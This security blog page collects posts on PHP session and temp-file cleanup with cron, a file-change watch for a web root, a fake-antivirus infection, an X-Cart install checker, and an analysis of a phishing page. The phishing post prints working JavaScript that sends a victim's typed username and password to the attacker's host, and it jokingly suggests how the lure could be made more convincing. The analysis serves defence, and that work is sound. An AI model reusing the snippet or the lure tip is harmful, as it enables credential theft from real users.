Category: "Security"

PHP session management and temporary file cleanup

By default, PHP expires old sessions from within requests: on a fraction of session_start() calls, set by session.gc_probability / session.gc_divisor, it runs a garbage collector that removes session files older than session.gc_maxlifetime. This simplifies installation, because no cron job is required, and those three settings let you tune how often the check and the cleanup actually run.

The default php.ini sets the lifetime to 1440 seconds (24 minutes). The same cleanup, done outside PHP:

# delete session files that have not been written to in the last 24 minutes
find /path/to/sessions -maxdepth 1 -type f -name 'sess_*' -mmin +24 -delete

Three details matter here: -mmin tests the modification time, which is what PHP's own collector uses (ctime also moves on permission or ownership changes); -name 'sess_*' restricts the deletion to the files PHP's files handler creates, so nothing else that happens to live in the directory is touched; and -delete avoids piping into xargs rm, which fails when find returns nothing.

Added as a cron job that runs every few minutes (one to five is reasonable), this clears the session directory of files older than 24 minutes, the default session.gc_maxlifetime. Once it is in place the find command replaces PHP's own cleanup, so session.gc_probability can be set to 0 and PHP never runs its garbage collector. (Debian-derived PHP packages ship exactly this arrangement: gc_probability = 0 plus a cron job.) The saving in request time is small, probably imperceptible, but session length becomes predictable, because expiry is driven by the clock rather than by how many requests happen to trigger the collector. Two checks before turning the collector off: session.save_path must point at a directory used only by this application (on a shared host the default is often a system temp directory, and the find would then expire other applications' sessions on the same schedule), and the cron job itself needs monitoring, because with gc_probability = 0 a stopped cron job means sessions never expire at all.

Name any temporary files a session needs after the session id, plus an extension that indicates type and use, for example 4365kh2kj54dfg2kjh12.wav, 4365kh2kj54dfg2kjh12.rpt.txt, 4365kh2kj54dfg2kjh12.rpt.html. A second cleanup script can then take each temporary file's basename, check whether the matching session file (sess_<id> with the default files handler) still exists, and delete the temporary files whose session is gone. Take the id from session_id() after session_start(), never from the raw cookie value, so that an attacker-supplied string cannot put path characters into the filename, and keep the temporary directory outside the web root and readable only by the web server user, since the filename reveals a live session id. The second script can be included in the main PHP script or run as a separate cron job, unless the contents of the temporary files are protected data, in which case they should be removed as soon as the session ends rather than on the next cleanup pass.

If logout is also used to destroy sessions (session_destroy()), the logout code should remove the related temporary files at that moment, rather than leaving sensitive files around for the cron job to find later.
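The two cleanups together, as an added example that is not from the original post: a POSIX shell script with one function that expires session files not written to within the lifetime and a second that removes temp files whose basename is the id of a session that no longer exists. The directories, the 24-minute lifetime and the script name are assumptions.

```shell
#!/bin/sh
# Added example, not from the original post. Expires stale PHP session files
# and removes temp files left behind by expired sessions. The directories,
# the 24-minute lifetime (PHP's default session.gc_maxlifetime = 1440 s) and
# the script name are assumptions.

# Delete session files (PHP's files handler names them sess_<id>) that have
# not been written to in the last $2 minutes. -mmin tests the same mtime that
# PHP's own garbage collector uses; -delete avoids xargs rm failing on empty input.
expire_sessions() {
    sessdir=$1
    maxmin=${2:-24}
    find "$sessdir" -maxdepth 1 -type f -name 'sess_*' -mmin +"$maxmin" -delete
}

# Remove temp files whose basename (the part before the first dot) is a
# session id with no matching sess_<id> file. Only names made of the
# characters PHP uses in session ids are considered, so files that do not
# follow the <sessionid>.<ext> scheme are left alone.
reap_orphans() {
    sessdir=$1
    tmpdir=$2
    for f in "$tmpdir"/*; do
        [ -f "$f" ] || continue
        name=${f##*/}
        sid=${name%%.*}
        case $sid in
            ''|*[!A-Za-z0-9,-]*) continue ;;
        esac
        [ -e "$sessdir/sess_$sid" ] || rm -f -- "$f"
    done
}

# Number of regular files directly under $1 (used to check the result).
count_files() {
    n=0
    for f in "$1"/*; do
        if [ -f "$f" ]; then n=$((n + 1)); fi
    done
    echo "$n"
}

# Cron usage, e.g. every five minutes (paths are assumptions):
#   */5 * * * * /usr/local/bin/session-cleanup.sh /var/lib/php/sessions /var/tmp/myapp
if [ -n "${1:-}" ] && [ -n "${2:-}" ]; then
    expire_sessions "$1" 24
    reap_orphans "$1" "$2"
fi
```

Run expire_sessions before reap_orphans, as the driver does, so that temp files belonging to a session that has just expired are removed on the same pass.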

Thank You Malwarebytes

I don't often "surf the 'net", visiting unfamiliar sites. Most of my Internet access is in search of LAMP/RIA technical resources and answers, as well as contributing my own through this blog and on the appropriate sites.

Recently, I was checking a search engine for entries related to a site and I clicked on htxx:–aolpsycho.com-d-www.stkc.org (the xxs and -s are there to prevent it from being a real URL). It infected my computer with a nasty virus. Key filenames: brastk.exe, beep.sys, delself.bat, bnokdcme.exe, as well as others, and registry corruption. It prevented execution of autoruns.exe, although renaming autoruns to a different name allowed it to run. It put a little red X image in the taskbar, prompting me to click to download 'Antivirus2009'.

I won’t describe how the files were identified, or any of the other resolution tactics - to avoid assisting the authors. However, if it shows up on your computer, the posted link solved the problem on this machine very nicely.

Sincere thanks to the author and I will purchase a copy of the product.

Have the Server Watch Your Account

The find command below, run from a crontab entry, will email you a report of all the files modified within the past 24 hours.

find $HOME -mtime 0

This searches your home directory for files modified in the last twenty-four hours. The -mtime test works in whole days: find divides the time since each file was last modified by 24 hours and discards the remainder, so -mtime 0 matches only files whose last modification is less than 24 hours ago.

http://linux.about.com/od/commands/l/blcmdl5_crontab.htm

Describes how to set up a cron job, so the command will execute periodically and email you the results.

MAILTO=me

5 0 * * * find $HOME/public_html -mtime 0

This simple command will tell you when files have been added or changed on your server (a deleted file leaves no entry, and a file added and removed within the same day is missed). You will probably want to exclude directories that change routinely, such as caches or logs, with -prune, so the report stays short enough that a new file stands out. Bear in mind that mtime is easy to forge: an intruder can run touch -r on a planted file to give it an old timestamp. Adding -o -ctime 0 catches that, because changing a file's timestamps updates its ctime, which cannot be set from user space without altering the system clock.
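The same watch as a script, with an exclusion for a directory that churns by design and a ctime check alongside the mtime one, added here as an example that is not part of the original post. The web root, the excluded cache directory, the 24-hour window and the script name are assumptions.

```shell
#!/bin/sh
# Added example, not from the original post. Reports files under a web root
# that changed within a time window, skipping a subtree that churns by design
# (a cache directory, say). Paths, the window and the excluded directory are
# assumptions.

# Internal helper: $1 root, $2 subtree under root to prune (may be empty),
# remaining arguments are the find tests applied to regular files.
_find_recent() {
    root=$1
    skip=$2
    shift 2
    if [ -n "$skip" ]; then
        find "$root" -path "$root/$skip" -prune -o -type f \( "$@" \) -print | sort
    else
        find "$root" -type f \( "$@" \) -print | sort
    fi
}

# What the post's crontab does: files whose content changed (mtime) in the
# last $2 minutes (default 1440 = 24 hours), excluding subtree $3.
recent_mtime() {
    _find_recent "$1" "${3:-}" -mmin -"${2:-1440}"
}

# Stronger check: files whose content (mtime) OR inode metadata (ctime)
# changed. An intruder can backdate mtime with touch, but that touch itself
# updates ctime, which cannot be set from user space without moving the clock.
recent_changes() {
    _find_recent "$1" "${3:-}" -mmin -"${2:-1440}" -o -cmin -"${2:-1440}"
}

# Line count of a report (used to check the result).
count_lines() {
    "$@" | wc -l | tr -d ' '
}

# Cron usage (MAILTO in the crontab delivers the output; paths are assumptions):
#   5 0 * * * /usr/local/bin/watch-webroot.sh $HOME/public_html cache
if [ -n "${1:-}" ]; then
    recent_changes "$1" 1440 "${2:-}"
fi
```

Running the script at 00:05 with a 1440-minute window gives back-to-back daily windows, so nothing falls between two reports; the mtime-only report is still useful for a quick read, but the mtime-or-ctime report is the one to trust after an incident.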

Nifty Phishing Approach

*** Scam was stopped ***

This phishing attempt was delivered through email, with the above link, claiming that maintenance was scheduled. It has some nice text, doesn't tell you to log in, but provides a link so you can. :)

It looks great.

The code below is the phishing code: it intercepts the login form submission and sends the username and password the victim typed to the sys82.net server, as query parameters of a script URL, where the attacker can collect them.


// presumably the fake form's submit handler; the surrounding handler is not shown on the page, so the function name is a guess
function onPhishSubmit() {
    var script = document.createElement('script');
    script.type = 'text/javascript';
    // the credentials leave as query parameters of a cross-site <script> GET, which no same-origin check stops
    script.src = 'http://sys82.net/index.php?loh=1&login=' + document.getElementById('loginid').value + '&password=' + document.getElementById('password').value;
    document.body.appendChild(script);
    return false; // cancel the real submission so the victim stays on the lookalike page
}

The page content is probably copied live from the real site, with the JavaScript added in by the phishermen, which is why it looks identical; the only tell is where the submitted credentials go.

The page is slow. It would be good to take a screenshot and use that as a background while the real page loads. :yes:

Free X-Cart Installation Checker

The checker is an HTML file: you enter the URL of your cart and the directory it is installed in, and it offers links you can click to see whether the server has been configured to protect the files that should not be served.

This tool is valuable for the following:

  • Engineering, security, and QA - to ensure the application was properly installed and protected
  • eCommerce site owners - to check the work of your web development company
  • Credit card gateway companies - to check the security of the application installed for requesting clients
  • Security - to identify risk areas for applications
  • Hosting companies - to check client accounts after security problems

You do not have to install it on a server, you can run it from the desktop. It does not require any server access beyond the browser. No passwords, no database access, no FTP, no SSH. It doesn’t use AJAX, it won’t log into your cart. It won’t analyze the results.

It is a very simple, free tool that runs under IE.

If you would like a copy, you must either have a live cart running, or be part of a web development company. Use an email with the domain name of the cart, or your web dev company, and I will send you the HTML - in a text file. Requests can be made through the contact form on this blog.

Please don’t use gmail, hotmail, yahoo or other free accounts. You will not receive any response.

The reason the page isn't posted for public access is that it would make it very easy for people to quickly check a cart's vulnerabilities. Limiting the distribution is for security. This is not an attempt to collect email addresses or domains that are running X-Cart. I know how to find carts. :)